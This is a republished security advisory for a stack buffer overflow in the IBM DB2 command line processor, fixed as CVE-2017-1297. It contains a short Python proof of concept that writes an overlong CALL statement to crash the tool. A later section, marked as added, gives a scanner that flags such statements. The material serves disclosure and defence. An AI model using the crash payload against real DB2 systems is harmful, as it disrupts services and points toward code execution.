IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow
Source: http://www.defensecode.com  Author: defensecode  Published: 2017-06-27
'''
           DefenseCode Security Advisory
    IBM DB2 Command Line Processor Buffer Overflow
 
 
Advisory ID: DC-2017-04-002
Advisory Title: IBM DB2 Command Line Processor Buffer Overflow
Advisory URL:
http://www.defensecode.com/advisories/IBM_DB2_Command_Line_Processor_Buffer_Overflow.pdf
Software: IBM DB2
Version: V9.7, V10.1, V10.5 and V11.1 on all platforms
Vendor Status: Vendor Contacted / Fixed (CVE-2017-1297)
Release Date: 26.06.2017
Risk: High
 
 
1. General Overview
===================
IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) Command
Line Processor (CLP) is vulnerable to a stack-based buffer overflow, caused
by improper bounds checking, which could allow an attacker to execute
arbitrary code. The vulnerability is triggered by providing an overly
long procedure name inside a CALL statement.
 
 
2. Software Overview
===================
DB2 is a database product from IBM. It is a Relational Database Management
System. DB2 is designed to store, analyze and retrieve the data efficiently.
DB2 currently supports Linux, UNIX and Windows platforms.
 
db2bp is a persistent background process for the DB2 Command Line
Processor, and it is the process which actually connects to the database.
 
 
3. Brief Vulnerability Description
==================================
By providing a specially crafted command file to the db2 CLP utility, it is
possible to cause a buffer overflow and possibly hijack the execution flow
of the program. The crafted file contains a CALL statement with an overly
long procedure parameter.
 
3.1 Proof of Concept
 
The following Python script will generate a proof of concept .sql crash
test file that can be used to verify the vulnerability:
 
-------
'''
 
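#!/usr/bin/python

# Procedure name far longer than the CLP expects.
load_overflow = 'A' * 1000
# Single CALL statement whose procedure name is the oversized string.
statement = "CALL " + load_overflow + ";"

# Write the crash test file; run it with: db2 -f crash.sql
with open("crash.sql", "w") as crash_file:
    crash_file.write(statement)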
 
'''
-------
 
PoC usage: db2 -f crash.sql
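
Added example (not part of the DefenseCode advisory): a pre-flight scanner
that flags CALL statements whose procedure name exceeds a length limit before
a command file is passed to db2 -f. The 128-byte limit, the function names and
the sample file are assumptions made for this example.

```python
import re
import sys

# Assumption: 128 bytes per identifier part; adjust to your DB2 release's SQL limits.
MAX_IDENT_BYTES = 128

# CALL followed by a procedure name, optionally schema-qualified and/or
# double-quoted. An unquoted part ends at whitespace, "(", ";", "." or a quote.
_PART = r'(?:"[^"]*"|[^\s(;."]+)'
_CALL_RE = re.compile(r"\bCALL\s+(" + _PART + r"(?:\." + _PART + r")*)", re.IGNORECASE)


def split_name(name):
    """Split schema.proc into parts, keeping dots inside quoted identifiers."""
    return [p.strip('"') for p in re.findall(r'"[^"]*"|[^."]+', name)]


def find_oversized_calls(sql_text, limit=MAX_IDENT_BYTES):
    """Return (line, byte_length) for each CALL name part longer than limit."""
    # Blank out "--" comment lines but keep line numbering intact.
    lines = ["" if ln.lstrip().startswith("--") else ln for ln in sql_text.splitlines()]
    text = "\n".join(lines)
    findings = []
    for match in _CALL_RE.finditer(text):
        line_no = text.count("\n", 0, match.start()) + 1
        for part in split_name(match.group(1)):
            size = len(part.encode("utf-8"))
            if size > limit:
                findings.append((line_no, size))
    return findings


# Constructed sample command file: two ordinary statements, two oversized names.
SAMPLE = "\n".join([
    "-- constructed sample",
    "CONNECT TO SAMPLE;",
    "CALL SYSPROC.ADMIN_CMD('DESCRIBE TABLE STAFF');",
    "CALL " + "A" * 1000 + ";",
    'CALL "MySchema".' + "B" * 129 + "(1);",
])

if __name__ == "__main__":
    # With a path argument, scan that file; otherwise scan the constructed sample.
    data = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    hits = find_oversized_calls(data)
    for line_no, size in hits:
        print("line %d: CALL name part is %d bytes (limit %d)" % (line_no, size, MAX_IDENT_BYTES))
    sys.exit(1 if hits else 0)
```

The scanner does not exclude CALL text inside string literals, so treat each
hit as an item to review rather than a confirmed trigger.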
 
 
4. Credits
==========
Vulnerability discovered by Leon Juranic, further analysis by
Bosko Stankovic.
 
 
5. About DefenseCode
================================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security vulnerabilities.
 
DefenseCode ThunderScan is a SAST (Static Application Security Testing,
WhiteBox Testing) solution for performing extensive security audits of
application source code. ThunderScan performs fast and accurate analyses
of large and complex source code projects delivering precise results and
low false positive rate.
 
DefenseCode WebScanner is a DAST (Dynamic Application Security Testing,
BlackBox Testing) solution for comprehensive security audits of active web
applications. WebScanner will test a website's security by carrying out a
large number of attacks using the most advanced techniques, just as a real
attacker would.
 
Subscribe for free software trial on our website http://www.defensecode.com/
'''
 